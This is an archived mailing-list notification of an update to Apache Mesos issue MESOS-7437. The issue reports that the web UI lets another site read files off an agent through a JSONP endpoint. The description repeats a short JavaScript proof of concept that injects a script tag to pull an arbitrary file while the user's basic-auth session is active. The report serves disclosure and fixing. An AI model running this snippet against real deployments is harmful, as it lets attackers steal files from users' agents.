mesos-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Jacob Janco (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (MESOS-7437) cross domain file-theft in the web-ui
Date Fri, 28 Apr 2017 22:06:04 GMT

     [ https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

Jacob Janco updated MESOS-7437:
-------------------------------
    Description: 
```
x=document.createElement('script')
x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
document.body.appendChild(x)
```

The above code pasted into the web console on http://example.com/, for example, will yield
the contents of the requested file. Basic auth is cached and resent in browser tabs/windows
as long as the user has authenticated during the browser session. 

  was:
x=document.createElement('script')
x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
document.body.appendChild(x)

The above code pasted into the web console on http://example.com/, for example, will yield
the contents of the requested file. Basic auth is cached and resent in browser tabs/windows
as long as the user has authenticated during the browser session. 


> cross domain file-theft in the web-ui
> -------------------------------------
>
>                 Key: MESOS-7437
>                 URL: https://issues.apache.org/jira/browse/MESOS-7437
>             Project: Mesos
>          Issue Type: Bug
>            Reporter: Jacob Janco
>            Assignee: Jacob Janco
>            Priority: Minor
>
> ```
> x=document.createElement('script')
> x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
> document.body.appendChild(x)
> ```
> The above code pasted into the web console on http://example.com/, for example, will
yield the contents of the requested file. Basic auth is cached and resent in browser tabs/windows
as long as the user has authenticated during the browser session. 



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)

Mime
View raw message